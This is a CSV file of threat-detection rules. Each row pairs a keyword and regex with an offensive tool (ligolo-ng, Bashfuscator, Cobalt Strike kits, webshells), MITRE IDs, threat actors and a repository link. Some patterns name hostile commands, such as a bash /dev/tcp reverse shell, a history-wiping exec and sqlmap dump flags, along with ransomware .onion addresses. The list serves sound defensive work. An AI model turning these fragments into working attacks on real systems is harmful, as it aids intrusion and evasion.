"*bafb49c76d6541518e9f22b688d52ca60f4b8c4bf692c35652e8642429c62a7f*",".{0,1000}bafb49c76d6541518e9f22b688d52ca60f4b8c4bf692c35652e8642429c62a7f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35281"
"*bananabr/TimeException*",".{0,1000}bananabr\/TimeException.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","1","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","35283"
"*bananaKitten.exe*",".{0,1000}bananaKitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","35284"
"*BaRMIe*",".{0,1000}BaRMIe.{0,1000}","offensive_tool_keyword","BaRMIe","BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.","T1522 - T1070 - T1573 - T1071","TA0001 - TA0003 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/NickstaDB/BaRMIe","1","0","N/A","N/A","N/A","8","731","97","2017-09-28T22:38:02Z","2017-09-24T18:54:12Z","35285"
"*baron-samedit-heap-based-overflow-sudo.txt*",".{0,1000}baron\-samedit\-heap\-based\-overflow\-sudo\.txt.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","35286"
"*base64(ticket.kirbi*",".{0,1000}base64\(ticket\.kirbi.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#content","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","35290"
"*base64_conversion_commands.ps1*",".{0,1000}base64_conversion_commands\.ps1.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","35291"
"*basemmnnqwxevlymli5bs36o5ynti55xojzvn246spahniugwkff2pad.onion*",".{0,1000}basemmnnqwxevlymli5bs36o5ynti55xojzvn246spahniugwkff2pad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","35292"
"*bash ./bounce.sh*",".{0,1000}bash\s\.\/bounce\.sh.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","#linux","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","35293"
"*bash extension_injection.sh*",".{0,1000}bash\sextension_injection\.sh.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#linux","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","35297"
"*bash -i &>/dev/tcp/* <&1*",".{0,1000}bash\s\-i\s\&\>\/dev\/tcp\/.{0,1000}\s\<\&1.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","35298"
"*bash lse.sh*",".{0,1000}bash\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","35301"
"*bash_executor *",".{0,1000}bash_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","0","#linux","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","35302"
"*BASH_HISTORY=/dev/null exec -a *",".{0,1000}BASH_HISTORY\=\/dev\/null\sexec\s\-a\s.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#linux","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","35303"
"*bash_read_line_reverse_tcp.py*",".{0,1000}bash_read_line_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","35304"
"*bashfuscator -*",".{0,1000}bashfuscator\s\-.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","35305"
"*Bashfuscator Team*",".{0,1000}Bashfuscator\sTeam.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","35306"
"*bashfuscator.py*",".{0,1000}bashfuscator\.py.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","35307"
"*Bashfuscator-master*",".{0,1000}Bashfuscator\-master.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","35308"
"*bashRCPersistence*",".{0,1000}bashRCPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","35309"
"*BasicServiceExploit.class*",".{0,1000}BasicServiceExploit\.class.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","35310"
"*bastad5huzwkepdixedg2gekg7jk22ato24zyllp6lnjx7wdtyctgvyd.onion*",".{0,1000}bastad5huzwkepdixedg2gekg7jk22ato24zyllp6lnjx7wdtyctgvyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","35311"
"*BastilleResearch*",".{0,1000}BastilleResearch.{0,1000}","offensive_tool_keyword","Github Username","Open source testing tools for the SDR & security community","T1179 - T1141 - T1142 - T1143","TA0011 - ","N/A","N/A","Exploitation tool","https://github.com/BastilleResearch","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","35312"
"*--batch --dump -T *",".{0,1000}\-\-batch\s\-\-dump\s\-T\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","35313"
"*Bates.exe --kill*",".{0,1000}Bates\.exe\s\-\-kill.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","35314"
"*Bates.exe --listen*",".{0,1000}Bates\.exe\s\-\-listen.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","35315"
"*Bat-Potato-main.zip*",".{0,1000}Bat\-Potato\-main\.zip.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","1","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","35316"
"*bats3c/ADCSPwn*",".{0,1000}bats3c\/ADCSPwn.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","35317"
"*bats3c/darkarmour*",".{0,1000}bats3c\/darkarmour.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","35318"
"*bats3c/DarkLoadLibrary*",".{0,1000}bats3c\/DarkLoadLibrary.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","N/A","10","10","1133","207","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z","35319"
"*bats3c/EvtMute*",".{0,1000}bats3c\/EvtMute.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","35320"
"*battle_net_stealer*",".{0,1000}battle_net_stealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","35321"
"*bawait_upload*",".{0,1000}bawait_upload.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","35323"
"*bawait_upload_raw*",".{0,1000}bawait_upload_raw.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","35324"
"*bb01642e30001ee637c9d4fc341484c06eaba67e8ce00b52dc6faf71b2daecfc*",".{0,1000}bb01642e30001ee637c9d4fc341484c06eaba67e8ce00b52dc6faf71b2daecfc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35325"
"*bb0234c8e7cb409a5032ac771706072ba1dfe49a72f934b11a0b0b6ef3437468*",".{0,1000}bb0234c8e7cb409a5032ac771706072ba1dfe49a72f934b11a0b0b6ef3437468.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35327"
"*bb141fb92bcd492552d5d6c09fbf39f7f674eb49*",".{0,1000}bb141fb92bcd492552d5d6c09fbf39f7f674eb49.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","35331"
"*bb1925f0abee8457796b7fcfa310bd00b37d46158c4f700da25a57ab062f5107*",".{0,1000}bb1925f0abee8457796b7fcfa310bd00b37d46158c4f700da25a57ab062f5107.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35332"
"*bb205ccc783d22b06eac7ab9e5f2f14d793bf9b4ed6fe413f888463092ccf79a*",".{0,1000}bb205ccc783d22b06eac7ab9e5f2f14d793bf9b4ed6fe413f888463092ccf79a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","35334"
"*bb239dee17aad653557b3c981e16e0622772f560e1a25fedc97639f7431ad77b*",".{0,1000}bb239dee17aad653557b3c981e16e0622772f560e1a25fedc97639f7431ad77b.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","35335"
"*bb2cfc48d0c06e32022593e6f3184d4e5b7b7c5f902938aad8f5d6181ac0d40d*",".{0,1000}bb2cfc48d0c06e32022593e6f3184d4e5b7b7c5f902938aad8f5d6181ac0d40d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35337"
"*bb2dae47e442008e774626bfaa7fdeaec3eb2bacdf307d547b3205e2ecad3513*",".{0,1000}bb2dae47e442008e774626bfaa7fdeaec3eb2bacdf307d547b3205e2ecad3513.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","35338"
"*bb33277d1d07b2dc6438e1a95eb4446d1c7a975ec0e70bb8f4b09fe1160205cd*",".{0,1000}bb33277d1d07b2dc6438e1a95eb4446d1c7a975ec0e70bb8f4b09fe1160205cd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35339"
"*bb3b1a1f-0447-42a6-955a-88681fb88499*",".{0,1000}bb3b1a1f\-0447\-42a6\-955a\-88681fb88499.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","C2","https://github.com/SpiderMate/Jatayu","1","0","#GUIDproject","N/A","N/A","10","33","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z","35340"
"*bb3ef2dc534defdd43d7fd9968db67ca726d701c78dfd420a0b8ef9520d69daf*",".{0,1000}bb3ef2dc534defdd43d7fd9968db67ca726d701c78dfd420a0b8ef9520d69daf.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","35341"
"*bb492ce3f8bf143311fd2272e57c342451d504feb639f0bc41a33df19cf459cf*",".{0,1000}bb492ce3f8bf143311fd2272e57c342451d504feb639f0bc41a33df19cf459cf.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35343"
"*bb5173e021c5e905809d7956cb5871edf062418d9227b553599480455d9e2524*",".{0,1000}bb5173e021c5e905809d7956cb5871edf062418d9227b553599480455d9e2524.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35344"
"*bb57ff50e43b27f0f38affe2192c1969dfedff65ea38664b48d1ed7722a0fdee*",".{0,1000}bb57ff50e43b27f0f38affe2192c1969dfedff65ea38664b48d1ed7722a0fdee.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35346"
"*bb62708fb9f961bffe55ec0fd74eead24e9d0b6c9e1ef054c845e7bc23af70a8*",".{0,1000}bb62708fb9f961bffe55ec0fd74eead24e9d0b6c9e1ef054c845e7bc23af70a8.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","35349"
"*bb62a3336da75791e241e3e757318dd0af03c1c678a249c3b67f16ef75ce648e*",".{0,1000}bb62a3336da75791e241e3e757318dd0af03c1c678a249c3b67f16ef75ce648e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35350"
"*bb63353c43f1a3ff8161674e4ffaf3835b1adbcbe6cba46b4aa7b06020f05233*",".{0,1000}bb63353c43f1a3ff8161674e4ffaf3835b1adbcbe6cba46b4aa7b06020f05233.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35351"
